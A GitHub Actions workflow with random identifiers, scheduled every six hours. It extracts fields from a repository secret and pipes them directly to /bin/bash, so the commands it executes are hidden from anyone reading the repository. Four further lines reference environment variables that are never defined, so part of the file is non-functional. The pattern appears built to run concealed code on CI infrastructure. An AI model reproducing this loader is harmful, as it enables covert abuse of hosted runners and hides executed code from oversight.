name: youquancun4523

on:
  workflow_dispatch:
  schedule:
    - cron: '23 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: youquancun4523
        env:
          n5007: ${{ secrets.n5007 }}
        run: |
          echo $n5007 | jq -r .ld3 | /bin/bash
          echo $vyho86137 | jq -r .rqgym40803 | /bin/bash
          echo $qo46510 | jq -r .wkm587 | /bin/bash
          echo $t97725 | jq -r .eiind4630 | /bin/bash
          echo $l9 | jq -r .zel9 | /bin/bash

